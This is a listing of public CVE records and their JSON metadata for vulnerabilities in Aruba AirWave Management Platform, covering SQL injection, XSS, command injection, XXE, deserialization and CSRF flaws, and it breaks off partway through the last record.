Vulnerabilites related to arubanetworks - airwave
cve-2021-25153
Vulnerability from cvelistv5
Published
2021-04-28 18:52
Modified
2024-08-03 19:56
Severity ?
Summary
A remote SQL injection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.538Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote SQL injection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote sql injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-28T18:52:37",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25153",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote SQL injection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote sql injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25153",
    "datePublished": "2021-04-28T18:52:37",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.538Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26967
Vulnerability from cvelistv5
Published
2021-03-05 16:33
Modified
2024-08-03 20:40
Severity ?
Summary
A remote reflected cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of certain components of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the AirWave management interface.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:40:46.952Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote reflected cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of certain components of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim\u2019s browser in the context of the AirWave management interface."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote reflected cross-site scripting (xss)",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:33:05",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26967",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote reflected cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of certain components of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim\u2019s browser in the context of the AirWave management interface."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote reflected cross-site scripting (xss)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26967",
    "datePublished": "2021-03-05T16:33:05",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:40:46.952Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-5323
Vulnerability from cvelistv5
Published
2020-02-27 16:20
Modified
2024-08-04 19:54
Severity ?
Summary
There are command injection vulnerabilities present in the AirWave application. Certain input fields controlled by an administrative user are not properly sanitized before being parsed by AirWave. If conditions are met, an attacker can obtain command execution on the host.
Impacted products
Vendor Product Version
n/a AirWave Management Platform Version: 8.x prior to 8.2.10.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T19:54:53.113Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "8.x prior to 8.2.10.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "There are command injection vulnerabilities present in the AirWave application. Certain input fields controlled by an administrative user are not properly sanitized before being parsed by AirWave. If conditions are met, an attacker can obtain command execution on the host."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Remote Code Execution via Command Injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-27T16:20:29",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2019-5323",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "8.x prior to 8.2.10.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "There are command injection vulnerabilities present in the AirWave application. Certain input fields controlled by an administrative user are not properly sanitized before being parsed by AirWave. If conditions are met, an attacker can obtain command execution on the host."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Remote Code Execution via Command Injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt",
              "refsource": "CONFIRM",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2019-5323",
    "datePublished": "2020-02-27T16:20:29",
    "dateReserved": "2019-01-04T00:00:00",
    "dateUpdated": "2024-08-04T19:54:53.113Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25154
Vulnerability from cvelistv5
Published
2021-04-28 18:32
Modified
2024-08-03 19:56
Severity ?
Summary
A remote escalation of privilege vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.608Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote escalation of privilege vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote escalation of privilege",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-28T18:32:38",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25154",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote escalation of privilege vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote escalation of privilege"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25154",
    "datePublished": "2021-04-28T18:32:38",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.608Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25165
Vulnerability from cvelistv5
Published
2021-04-28 19:56
Modified
2024-08-03 19:56
Severity ?
Summary
A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.474Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote xml external entity",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-28T19:56:26",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25165",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote xml external entity"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25165",
    "datePublished": "2021-04-28T19:56:26",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.474Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-5326
Vulnerability from cvelistv5
Published
2020-02-27 16:23
Modified
2024-08-04 19:54
Severity ?
Summary
An administrative application user of or application user with write access to Aruba Airwave VisualRF is able to obtain code execution on the AMP platform. This is possible due to the ability to overwrite a file on disk which is subsequently deserialized by the Java application component.
Impacted products
Vendor Product Version
n/a AirWave Management Platform Version: 8.x prior to 8.2.10.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T19:54:53.217Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "8.x prior to 8.2.10.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An administrative application user of or application user with write access to Aruba Airwave VisualRF is able to obtain code execution on the AMP platform. This is possible due to the ability to overwrite a file on disk which is subsequently deserialized by the Java application component."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Remote Code Execution due to unsafe Java Deserialization",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-27T16:23:10",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2019-5326",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "8.x prior to 8.2.10.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An administrative application user of or application user with write access to Aruba Airwave VisualRF is able to obtain code execution on the AMP platform. This is possible due to the ability to overwrite a file on disk which is subsequently deserialized by the Java application component."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Remote Code Execution due to unsafe Java Deserialization"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt",
              "refsource": "CONFIRM",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2019-5326",
    "datePublished": "2020-02-27T16:23:10",
    "dateReserved": "2019-01-04T00:00:00",
    "dateUpdated": "2024-08-04T19:54:53.217Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26961
Vulnerability from cvelistv5
Published
2021-03-05 15:50
Modified
2024-08-03 20:33
Severity ?
Summary
A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.562Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote unauthenticated cross-site request forgery (csrf)",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T15:50:56",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26961",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote unauthenticated cross-site request forgery (csrf)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26961",
    "datePublished": "2021-03-05T15:50:56",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:33:41.562Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26963
Vulnerability from cvelistv5
Published
2021-03-05 16:08
Modified
2024-08-03 20:33
Severity ?
Summary
A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.564Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authenticated arbitrary command execution",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:08:40",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26963",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authenticated arbitrary command execution"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26963",
    "datePublished": "2021-03-05T16:08:40",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:33:41.564Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26965
Vulnerability from cvelistv5
Published
2021-03-05 16:29
Modified
2024-08-03 20:33
Severity ?
Summary
A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.414Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
